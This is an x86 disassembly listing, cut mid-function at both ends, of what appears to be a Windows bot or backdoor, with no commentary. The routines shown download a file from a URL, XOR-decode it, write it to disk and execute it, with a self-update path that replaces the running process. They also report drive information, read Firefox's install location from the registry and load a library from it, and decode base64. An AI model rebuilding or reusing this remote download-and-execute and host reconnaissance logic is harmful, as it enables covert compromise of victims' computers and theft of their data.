mov [ebp+70h+var_8], 1Eh
loc_4055C1: ; CODE XREF: sub_40557C+EE�j
cmp [ebp+70h+arg_4], 1
jnz short loc_4055CC
mov eax, [ebp+70h+var_8]
jmp short loc_4055D1
; ---------------------------------------------------------------------------
loc_4055CC: ; CODE XREF: sub_40557C+49�j
mov eax, [ebp+70h+var_4]
add eax, eax
loc_4055D1: ; CODE XREF: sub_40557C+4E�j
lea ecx, [ebp+eax*4+70h+var_F4]
lea esi, [ebp+eax*4+70h+var_F8]
mov eax, [ebp+70h+var_4]
movzx eax, byte ptr dword_41E3E8[eax]
mov [ecx], ebx
mov [esi], ebx
xor edx, edx
mov edi, eax
loc_4055F1: ; CODE XREF: sub_40557C+8D�j
cmp edi, 1Ch
jge short loc_4055FC
mov bl, [ebp+edi+70h+var_78]
jmp short loc_405600
; ---------------------------------------------------------------------------
loc_4055FC: ; CODE XREF: sub_40557C+78�j
mov bl, [ebp+edi+70h+var_94]
loc_405600: ; CODE XREF: sub_40557C+7E�j
mov [ebp+edx+70h+var_40], bl
inc edx
inc edi
cmp edx, 1Ch
jl short loc_4055F1
push 1Ch
pop edi
add eax, edi
loc_405610: ; CODE XREF: sub_40557C+AC�j
cmp eax, 38h
jge short loc_40561B
mov dl, [ebp+eax+70h+var_78]
jmp short loc_40561F
; ---------------------------------------------------------------------------
loc_40561B: ; CODE XREF: sub_40557C+97�j
mov dl, [ebp+eax+70h+var_94]
loc_40561F: ; CODE XREF: sub_40557C+9D�j
mov [ebp+edi+70h+var_40], dl
inc edi
inc eax
cmp edi, 38h
jl short loc_405610
xor ebx, ebx
xor eax, eax
loc_40562E: ; CODE XREF: sub_40557C+E1�j
lea edx, dword_41E410[eax]
movzx edi, byte ptr [edx-18h]
cmp [ebp+edi+70h+var_40], bl
jz short loc_405647
mov edi, dword_41E350[eax*4]
or [esi], edi
loc_405647: ; CODE XREF: sub_40557C+C0�j
movzx edx, byte ptr [edx]
cmp [ebp+edx+70h+var_40], bl
jz short loc_405659
mov edx, dword_41E350[eax*4]
or [ecx], edx
loc_405659: ; CODE XREF: sub_40557C+D2�j
inc eax
cmp eax, 18h
jl short loc_40562E
sub [ebp+70h+var_8], 2
inc [ebp+70h+var_4]
cmp [ebp+70h+var_8], 0FFFFFFFEh
jg loc_4055C1
lea eax, [ebp+70h+var_F8]
push eax
call sub_4054AE
pop ecx
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_40557C endp
; =============== S U B R O U T I N E =======================================
sub_405685 proc near ; CODE XREF: sub_4056A2+11D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_4056A1
loc_405691: ; CODE XREF: sub_405685+1A�j
mov dl, byte_41E139
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_405691
locret_4056A1: ; CODE XREF: sub_405685+A�j
retn
sub_405685 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056A2 proc near ; DATA XREF: sub_40198E+23E6�o
; sub_40198E+25F2�o
var_78C = qword ptr -78Ch
var_780 = qword ptr -780h
var_710 = byte ptr -710h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_60 = dword ptr -60h
var_40 = dword ptr -40h
var_3C = word ptr -3Ch
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 710h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0A9h
lea edi, [ebp+var_310]
rep movsd
xor esi, esi
push esi
push esi
xor edi, edi
push esi
inc edi
mov [eax+2A0h], edi
push esi
lea eax, [ebp+var_28C]
push eax
push dword_4BD8E0
call dword_419200 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_C], eax
jz loc_405AD9
push esi
push esi
push 2
push esi
push esi
push 40000000h
lea eax, [ebp+var_18C]
push eax
call dword_4190E0 ; CreateFileA
cmp eax, edi
mov [ebp+var_14], eax
jnb short loc_405768
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_710]
push offset aCouldnTOpenF_0 ; "Couldn't open file: %s."
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_78], esi
jnz short loc_40574B
push [ebp+var_74]
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_30C]
push eax
push [ebp+var_310]
call sub_4017B6
add esp, 10h
loc_40574B: ; CODE XREF: sub_4056A2+88�j
lea eax, [ebp+var_710]
push eax
call sub_401648
push [ebp+var_8C]
call sub_40AADD
pop ecx
jmp loc_405B39
; ---------------------------------------------------------------------------
loc_405768: ; CODE XREF: sub_4056A2+68�j
xor edi, edi
call dword_4190A8 ; GetTickCount
mov ebx, 7D000h
push ebx
mov [ebp+var_4], eax
call sub_40E74F
pop ecx
mov [ebp+var_10], eax
loc_405782: ; CODE XREF: sub_4056A2+1AE�j
push 400h
lea eax, [ebp+var_710]
push esi
push eax
call sub_40D7B0
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
push 400h
lea eax, [ebp+var_710]
push eax
push [ebp+var_C]
call dword_419204 ; InternetReadFile
cmp [ebp+var_7C], esi
jz short loc_4057C6
push [ebp+arg_0]
lea eax, [ebp+var_710]
push eax
call sub_405685
pop ecx
pop ecx
loc_4057C6: ; CODE XREF: sub_4056A2+111�j
push esi
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_710]
push eax
push [ebp+var_14]
call dword_4190DC ; WriteFile
cmp edi, ebx
jnb short loc_405804
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_4057EE
mov eax, [ebp+arg_0]
loc_4057EE: ; CODE XREF: sub_4056A2+147�j
push eax
lea eax, [ebp+var_710]
push eax
mov eax, [ebp+var_10]
add eax, edi
push eax
call sub_40E3A0
add esp, 0Ch
loc_405804: ; CODE XREF: sub_4056A2+13E�j
add edi, [ebp+arg_0]
cmp [ebp+var_80], esi
jz short loc_405811
cmp edi, [ebp+var_80]
ja short loc_405856
loc_405811: ; CODE XREF: sub_4056A2+168�j
mov eax, edi
shr eax, 0Ah
push eax
lea eax, [ebp+var_28C]
push eax
mov eax, [ebp+var_8C]
imul eax, 434h
add eax, offset dword_421E08
cmp [ebp+var_88], 1
jz short loc_40583F
push offset aFileDownloadSD ; "File download: %s (%dKB transferred)."
jmp short loc_405844
; ---------------------------------------------------------------------------
loc_40583F: ; CODE XREF: sub_4056A2+194�j
push offset aUpdateSDkbTran ; "Update: %s (%dKB transferred)."
loc_405844: ; CODE XREF: sub_4056A2+19B�j
push eax
call sub_40D6BB
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_405782
loc_405856: ; CODE XREF: sub_4056A2+16D�j
cmp [ebp+var_80], esi
mov [ebp+var_8], 1
jz short loc_4058AA
cmp edi, [ebp+var_80]
jz short loc_4058AA
push [ebp+var_80]
lea eax, [ebp+var_710]
push edi
push offset aFilesizeIsInco ; "Filesize is incorrect: (%d != %d)."
push eax
mov [ebp+var_8], esi
call sub_40D6BB
push [ebp+var_74]
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_30C]
push eax
push [ebp+var_310]
call sub_4017B6
lea eax, [ebp+var_710]
push eax
call sub_401648
add esp, 24h
loc_4058AA: ; CODE XREF: sub_4056A2+1BE�j
; sub_4056A2+1C3�j
call dword_4190A8 ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_14]
mov ecx, eax
inc ecx
mov eax, edi
div ecx
mov ebx, eax
call dword_419064 ; CloseHandle
push [ebp+var_10]
call sub_40E359
cmp [ebp+var_8], esi
pop ecx
jz loc_405B25
cmp [ebp+var_88], 1
jz loc_4059E6
test ebx, ebx
mov [ebp+var_4], ebx
fild [ebp+var_4]
jge short loc_4058FF
fadd dbl_419F58
loc_4058FF: ; CODE XREF: sub_4056A2+255�j
test edi, edi
fmul dbl_419F50
push ecx
push ecx
fstp [esp+780h+var_780]
lea eax, [ebp+var_18C]
mov [ebp+var_4], edi
fild [ebp+var_4]
push eax
jge short loc_405921
fadd dbl_419F58
loc_405921: ; CODE XREF: sub_4056A2+277�j
fmul dbl_419F50
push ecx
push ecx
lea eax, [ebp+var_710]
fstp [esp+78Ch+var_78C]
push offset aDownloaded_1fK ; "Downloaded %.1f KB to %s @ %.1f KB/sec."...
push eax
call sub_40D6BB
add esp, 1Ch
cmp [ebp+var_78], esi
jnz short loc_405964
push [ebp+var_74]
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_30C]
push eax
push [ebp+var_310]
call sub_4017B6
add esp, 10h
loc_405964: ; CODE XREF: sub_4056A2+2A1�j
lea eax, [ebp+var_710]
push eax
call sub_401648
cmp [ebp+var_84], 1
pop ecx
jnz loc_405B25
push 5
push esi
push esi
lea eax, [ebp+var_18C]
push eax
push offset aOpen_0 ; "open"
push esi
call dword_4191D8
cmp [ebp+var_78], esi
jnz loc_405B25
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_710]
push offset aOpenedS_ ; "Opened: %s."
push eax
call sub_40D6BB
push [ebp+var_74]
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_30C]
push eax
push [ebp+var_310]
call sub_4017B6
lea eax, [ebp+var_710]
push eax
call sub_401648
add esp, 20h
jmp loc_405B25
; ---------------------------------------------------------------------------
loc_4059E6: ; CODE XREF: sub_4056A2+247�j
test ebx, ebx
mov [ebp+var_4], ebx
fild [ebp+var_4]
jge short loc_4059F6
fadd dbl_419F58
loc_4059F6: ; CODE XREF: sub_4056A2+34C�j
test edi, edi
fmul dbl_419F50
push ecx
push ecx
fstp [esp+780h+var_780]
lea eax, [ebp+var_18C]
mov [ebp+var_4], edi
fild [ebp+var_4]
push eax
jge short loc_405A18
fadd dbl_419F58
loc_405A18: ; CODE XREF: sub_4056A2+36E�j
fmul dbl_419F50
push ecx
push ecx
lea eax, [ebp+var_710]
fstp [esp+78Ch+var_78C]
push offset aDownloaded_1fk ; "Downloaded %.1fKB to %s @ %.1fKB/sec. U"...
push eax
call sub_40D6BB
add esp, 1Ch
cmp [ebp+var_78], esi
jnz short loc_405A5B
push [ebp+var_74]
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_30C]
push eax
push [ebp+var_310]
call sub_4017B6
add esp, 10h
loc_405A5B: ; CODE XREF: sub_4056A2+398�j
lea eax, [ebp+var_710]
push eax
call sub_401648
push 10h
lea eax, [ebp+var_28]
push esi
push eax
call sub_40D7B0
push 44h
pop edi
push edi
lea eax, [ebp+var_6C]
push esi
push eax
call sub_40D7B0
add esp, 1Ch
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_6C]
push eax
push esi
push esi
push 28h
push esi
push esi
mov [ebp+var_6C], edi
push esi
lea eax, [ebp+var_18C]
xor edi, edi
push eax
inc edi
push esi
mov [ebp+var_60], offset word_41994E
mov [ebp+var_40], edi
mov [ebp+var_3C], si
call dword_41909C ; CreateProcessA
cmp eax, edi
jnz short loc_405ACB
call dword_419244 ; WSACleanup
call sub_408B66
push esi
call dword_4190B8 ; ExitProcess
loc_405ACB: ; CODE XREF: sub_4056A2+415�j
lea eax, [ebp+var_18C]
push eax
push offset aUpdateFailedEr ; "Update failed: Error executing file: %s"...
jmp short loc_405AE5
; ---------------------------------------------------------------------------
loc_405AD9: ; CODE XREF: sub_4056A2+45�j
lea eax, [ebp+var_28C]
push eax
push offset aBadUrlOrDnsErr ; "Bad URL, or DNS Error: %s."
loc_405AE5: ; CODE XREF: sub_4056A2+435�j
lea eax, [ebp+var_710]
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_78], esi
jnz short loc_405B18
push [ebp+var_74]
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_30C]
push eax
push [ebp+var_310]
call sub_4017B6
add esp, 10h
loc_405B18: ; CODE XREF: sub_4056A2+455�j
lea eax, [ebp+var_710]
push eax
call sub_401648
pop ecx
loc_405B25: ; CODE XREF: sub_4056A2+23A�j
; sub_4056A2+2D6�j ...
push [ebp+var_C]
call dword_419208 ; InternetCloseHandle
push [ebp+var_8C]
call sub_40AADD
loc_405B39: ; CODE XREF: sub_4056A2+C1�j
pop ecx
push esi
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_4056A2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B42 proc near ; CODE XREF: sub_405C48+66�p
; sub_405C48+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 32h
push 0
mov edi, offset dword_4C1978
push edi
call sub_40D7B0
add esp, 0Ch
lea esi, [ebp+var_40]
push ebx
loc_405B64: ; CODE XREF: sub_405B42+52�j
; sub_405B42+58�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E770
add cl, 30h
mov [esi], cl
inc esi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_405B9C
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_405B64
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_405B64
; ---------------------------------------------------------------------------
loc_405B9C: ; CODE XREF: sub_405B42+42�j
mov eax, edi
pop ebx
jmp short loc_405BA6
; ---------------------------------------------------------------------------
loc_405BA1: ; CODE XREF: sub_405B42+6A�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_405BA6: ; CODE XREF: sub_405B42+5D�j
dec esi
lea ecx, [ebp+var_40]
cmp esi, ecx
jnb short loc_405BA1
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
leave
retn
sub_405B42 endp
; =============== S U B R O U T I N E =======================================
sub_405BB7 proc near ; CODE XREF: sub_405D63+40�p
; sub_405D63+76�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4190E4 ; GetDriveTypeA
sub eax, 0
jz short loc_405BFA
dec eax
jz short loc_405BF4
dec eax
dec eax
jz short loc_405BEE
dec eax
jz short loc_405BE8
dec eax
jz short loc_405BE2
dec eax
jz short loc_405BDC
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_405BDC: ; CODE XREF: sub_405BB7+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_405BE2: ; CODE XREF: sub_405BB7+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_405BE8: ; CODE XREF: sub_405BB7+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_405BEE: ; CODE XREF: sub_405BB7+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_405BF4: ; CODE XREF: sub_405BB7+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_405BFA: ; CODE XREF: sub_405BB7+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_405BB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C00 proc near ; CODE XREF: sub_405C48+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4C4688
test eax, eax
jz short loc_405C35
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax
loc_405C35: ; CODE XREF: sub_405C00+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_405C00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C48 proc near ; CODE XREF: sub_405D63+17�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_405C00
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_405D20
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_405D20
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_405D20
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_40E810
push edx
push eax
call sub_405B42
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_40DFEC
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_40E810
push edx
push eax
call sub_405B42
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_40DFEC
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_40E810
push edx
push eax
call sub_405B42
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_40DFEC
add esp, 18h
pop ebx
jmp short loc_405D4F
; ---------------------------------------------------------------------------
loc_405D20: ; CODE XREF: sub_405C48+2C�j
; sub_405C48+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_40D6BB
lea eax, [ebp+var_130]
push esi
push eax
call sub_40D6BB
lea eax, [ebp+var_B0]
push esi
push eax
call sub_40D6BB
add esp, 18h
loc_405D4F: ; CODE XREF: sub_405C48+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_405C48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D63 proc near ; CODE XREF: sub_405E21+B�j
; sub_405E21+4F�p
var_700 = byte ptr -700h
var_580 = byte ptr -580h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 700h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_700]
push ebx
push eax
call sub_405C48
push 60h
pop ecx
mov esi, eax
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
lea edi, [ebp+var_180]
push eax
rep movsd
call sub_40D720
add esp, 10h
test eax, eax
jnz short loc_405DC5
push ebx
push ebx
call sub_405BB7
pop ecx
push eax
push offset aSDriveSShit_ ; "%s Drive (%s): shit."
lea eax, [ebp+var_580]
push 400h
push eax
call sub_40DFEC
add esp, 14h
jmp short loc_405DF9
; ---------------------------------------------------------------------------
loc_405DC5: ; CODE XREF: sub_405D63+3C�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_405BB7
pop ecx
push eax
push offset aSDriveSSDiskSL ; "%s Drive (%s): %s Disk, %s Lib, %s ."
lea eax, [ebp+var_580]
push 400h
push eax
call sub_40DFEC
add esp, 20h
loc_405DF9: ; CODE XREF: sub_405D63+60�j
push 1
lea eax, [ebp+var_580]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4017B6
lea eax, [ebp+var_580]
push eax
call sub_401648
add esp, 14h
pop edi
pop esi
pop ebx
leave
retn
sub_405D63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E21 proc near ; CODE XREF: sub_40198E+14C0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_405E31
pop ebp
jmp sub_405D63
; ---------------------------------------------------------------------------
loc_405E31: ; CODE XREF: sub_405E21+8�j
push ebx
push esi
mov esi, dword_4190E8
push edi
push eax
push eax
call esi ; GetLogicalDriveStringsA
lea edi, [eax+2]
push edi
call sub_40E74F
pop ecx
mov ebx, eax
push ebx
push edi
call esi ; GetLogicalDriveStringsA
cmp byte ptr [ebx], 0
mov esi, ebx
jz short loc_405E88
loc_405E55: ; CODE XREF: sub_405E21+65�j
push offset aA ; "A:\\"
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_405E78
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D63
add esp, 10h
loc_405E78: ; CODE XREF: sub_405E21+43�j
push esi
call sub_40D630
lea esi, [esi+eax+1]
cmp byte ptr [esi], 0
pop ecx
jnz short loc_405E55
loc_405E88: ; CODE XREF: sub_405E21+32�j
push ebx
call sub_40E359
pop ecx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_405E21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E94 proc near ; CODE XREF: sub_4069DE+8�p
var_154 = byte ptr -154h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
push 10h
pop ecx
mov esi, offset aSoftwareClient ; "SOFTWARE\\Clients\\StartMenuInternet\\fire"...
lea edi, [ebp+var_154]
rep movsd
push 40h
pop ecx
movsw
xor eax, eax
xor ebx, ebx
mov [ebp+var_110], bl
lea edi, [ebp+var_10F]
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
push eax
push 20019h
push ebx
lea eax, [ebp+var_154]
push eax
push 80000002h
mov [ebp+var_8], 104h
call dword_419018 ; RegOpenKeyExA
test eax, eax
jnz loc_405FCF
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push [ebp+var_4]
call dword_419000 ; RegQueryValueExA
test eax, eax
jnz loc_405FC6
cmp [ebp+var_8], ebx
jbe loc_405FC6
cmp [ebp+var_110], bl
jz loc_405FC6
push [ebp+var_4]
call dword_419014 ; RegCloseKey
cmp [ebp+var_110], 22h
jnz short loc_405F71
lea eax, [ebp+var_110]
push eax
xor esi, esi
call sub_40D630
dec eax
pop ecx
jz short loc_405F71
loc_405F50: ; CODE XREF: sub_405E94+DB�j
mov al, [ebp+esi+var_10F]
mov [ebp+esi+var_110], al
lea eax, [ebp+var_110]
push eax
inc esi
call sub_40D630
dec eax
cmp esi, eax
pop ecx
jb short loc_405F50
loc_405F71: ; CODE XREF: sub_405E94+A8�j
; sub_405E94+BA�j
lea eax, [ebp+var_110]
push eax
call sub_40D630
pop ecx
jmp short loc_405F8A
; ---------------------------------------------------------------------------
loc_405F80: ; CODE XREF: sub_405E94+F9�j
cmp [ebp+eax+var_110], 5Ch
jz short loc_405F91
loc_405F8A: ; CODE XREF: sub_405E94+EA�j
dec eax
cmp eax, ebx
jg short loc_405F80
jmp short loc_405F98
; ---------------------------------------------------------------------------
loc_405F91: ; CODE XREF: sub_405E94+F4�j
mov [ebp+eax+var_110], bl
loc_405F98: ; CODE XREF: sub_405E94+FB�j
lea eax, [ebp+var_110]
push eax
call sub_40D630
inc eax
push eax
call sub_40E74F
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz short loc_405FC2
lea eax, [ebp+var_110]
push eax
push esi
call sub_40D8A0
pop ecx
pop ecx
loc_405FC2: ; CODE XREF: sub_405E94+11D�j
mov eax, esi
jmp short loc_405FD1
; ---------------------------------------------------------------------------
loc_405FC6: ; CODE XREF: sub_405E94+7D�j
; sub_405E94+86�j ...
push [ebp+var_4]
call dword_419014 ; RegCloseKey
loc_405FCF: ; CODE XREF: sub_405E94+5B�j
xor eax, eax
loc_405FD1: ; CODE XREF: sub_405E94+130�j
pop edi
pop esi
pop ebx
leave
retn
sub_405E94 endp
; =============== S U B R O U T I N E =======================================
sub_405FD6 proc near ; CODE XREF: sub_406425:loc_4065A6�p
; sub_4065B2+16�p ...
cmp dword_4C45D8, 0
jz short loc_405FEA
mov eax, dword_4C45D0
test eax, eax
jz short loc_405FEA
call eax
loc_405FEA: ; CODE XREF: sub_405FD6+7�j
; sub_405FD6+10�j
mov eax, dword_4C45DC
test eax, eax
push esi
mov esi, dword_4190EC
jz short loc_405FFD
push eax
call esi ; FreeLibrary
loc_405FFD: ; CODE XREF: sub_405FD6+22�j
mov eax, dword_4C45E0
test eax, eax
jz short loc_406009
push eax
call esi ; FreeLibrary
loc_406009: ; CODE XREF: sub_405FD6+2E�j
pop esi
retn
sub_405FD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40600B proc near ; CODE XREF: sub_406425+2A�p
; sub_406425+37�p ...
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_40D9A0
and [ebp+var_1000], 0
push edi
push [ebp+arg_0]
xor eax, eax
mov ecx, 3FFh
lea edi, [ebp+var_FFF]
rep stosd
stosw
stosb
lea eax, [ebp+var_1000]
push eax
call sub_40D8A0
lea eax, [ebp+var_1000]
push offset asc_41A0AC ; "/"
push eax
call sub_40D8B0
push [ebp+arg_4]
lea eax, [ebp+var_1000]
push eax
call sub_40D8B0
add esp, 18h
lea eax, [ebp+var_1000]
push eax
call dword_4190F0 ; LoadLibraryA
mov dword_4C45E4, eax
pop edi
leave
retn
sub_40600B endp
; =============== S U B R O U T I N E =======================================
sub_406079 proc near ; CODE XREF: sub_4065B2+6C�p
arg_0 = dword ptr 4
push edi
call dword_4C41BC
mov edi, eax
test edi, edi
jnz short loc_406088
pop edi
retn
; ---------------------------------------------------------------------------
loc_406088: ; CODE XREF: sub_406079+B�j
push esi
mov esi, [esp+8+arg_0]
cmp byte ptr [esi], 0
jz short loc_4060A9
push offset word_41994E
push edi
call dword_4C45D4
test eax, eax
pop ecx
pop ecx
jnz short loc_4060A9
xor esi, esi
inc esi
jmp short loc_4060BA
; ---------------------------------------------------------------------------
loc_4060A9: ; CODE XREF: sub_406079+17�j
; sub_406079+29�j
push esi
push edi
call dword_4C45D4
mov esi, eax
neg esi
pop ecx
sbb esi, esi
pop ecx
inc esi
loc_4060BA: ; CODE XREF: sub_406079+2E�j
push edi
call dword_4C45C4
pop ecx
mov eax, esi
pop esi
pop edi
retn
sub_406079 endp
; =============== S U B R O U T I N E =======================================
sub_4060C7 proc near ; CODE XREF: sub_406761+63�p
; sub_406761+83�p
arg_0 = dword ptr 4
and dword_4C45EC, 0
and dword_4C45E8, 0
push offset aR_0 ; "r"
push [esp+4+arg_0]
call sub_40E8E4
pop ecx
pop ecx
xor ecx, ecx
test eax, eax
setnz cl
mov dword_4C45F0, eax
mov eax, ecx
retn
sub_4060C7 endp
; =============== S U B R O U T I N E =======================================
sub_4060F4 proc near ; CODE XREF: sub_40662C:loc_40665C�p
mov eax, dword_4C45EC
cmp eax, dword_4C45E8
jl short loc_40612E
push dword_4C45F0
and dword_4C45EC, 0
push 2800h
push 1
push offset byte_4C19B8
call sub_40E94D
add esp, 10h
test eax, eax
mov dword_4C45E8, eax
jg short loc_40612E
xor al, al
retn
; ---------------------------------------------------------------------------
loc_40612E: ; CODE XREF: sub_4060F4+B�j
; sub_4060F4+35�j
mov eax, dword_4C45EC
mov al, byte_4C19B8[eax]
inc dword_4C45EC
retn
sub_4060F4 endp
; =============== S U B R O U T I N E =======================================
sub_406140 proc near ; CODE XREF: sub_406676+44�p
; sub_406676+D8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_0]
push edi
call sub_40D630
mov esi, eax
xor ebx, ebx
cmp byte ptr [esi+edi-1], 3Dh
pop ecx
jnz short loc_406164
inc ebx
cmp byte ptr [esi+edi-2], 3Dh
jnz short loc_406164
push 2
pop ebx
loc_406164: ; CODE XREF: sub_406140+17�j
; sub_406140+1F�j
push 0
push esi
push edi
call dword_4C19B0
mov ecx, [esp+18h+arg_4]
add esp, 0Ch
test eax, eax
mov [ecx], eax
jz short loc_40618F
lea eax, [esi+esi*2]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [esp+0Ch+arg_8]
sub eax, ebx
mov [ecx], eax
xor eax, eax
inc eax
